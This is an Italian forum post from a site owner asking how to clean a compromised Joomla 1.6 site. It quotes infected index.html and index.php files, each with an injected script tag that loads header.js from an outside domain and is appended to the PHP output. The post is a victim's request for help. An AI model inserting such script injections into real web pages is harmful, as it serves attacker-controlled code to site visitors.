Salve, qualcuno saprebbe dirmi come disinfettare un webspace infettato da questo virus? ho notato che si ostina a modificare i codici dei files index.html e index.php. I siti in questione sono QUESTO e QUESTO. Entrambi si basano sulla piattaforma Joomla 1.6
Di seguito vi posto i files incriminati, in modo da farvi capire...
index.html
Codice:
<html>
<body><script type="text/javascript" src="http://robertwalz.com/header.js"></script>
</body>
</html>
ecco la parte incriminata
Codice:
<script type="text/javascript" src="http://robertwalz.com/header.js"></script>
index.php
Codice:
<?php
/**
* @package Joomla.Site
* @copyright Copyright (C) 2005 - 2012 Open Source Matters, Inc. All rights reserved.
* @license GNU General Public License version 2 or later; see LICENSE.txt
*/
// Set flag that this is a parent file.
define('_JEXEC', 1);
define('DS', DIRECTORY_SEPARATOR);
if (file_exists(dirname(__FILE__) . '/defines.php')) {
include_once dirname(__FILE__) . '/defines.php';
}
if (!defined('_JDEFINES')) {
define('JPATH_BASE', dirname(__FILE__));
require_once JPATH_BASE.'/includes/defines.php';
}
require_once JPATH_BASE.'/includes/framework.php';
// Mark afterLoad in the profiler.
JDEBUG ? $_PROFILER->mark('afterLoad') : null;
// Instantiate the application.
$app = JFactory::getApplication('site');
// Initialise the application.
$app->initialise();
// Mark afterIntialise in the profiler.
JDEBUG ? $_PROFILER->mark('afterInitialise') : null;
// Route the application.
$app->route();
// Mark afterRoute in the profiler.
JDEBUG ? $_PROFILER->mark('afterRoute') : null;
// Dispatch the application.
$app->dispatch();
// Mark afterDispatch in the profiler.
JDEBUG ? $_PROFILER->mark('afterDispatch') : null;
// Render the application.
$app->render();
// Mark afterRender in the profiler.
JDEBUG ? $_PROFILER->mark('afterRender') : null;
// Return the response.
echo $app;<html><body><script type="text/javascript" src="http://robertwalz.com/header.js"></script></body></html>
ed ecco la parte incriminata!!!
Codice:
// Return the response.
echo $app;<html><body><script type="text/javascript" src="http://robertwalz.com/header.js"></script></body></html>
Qualcuno sa fornirmi assistenza?! Grazie!! :)
EDIT:
Ho provato a scaricare tutti i files sul mio pc e li ho analizzati con NOD32. Nessun risultato riscontrato!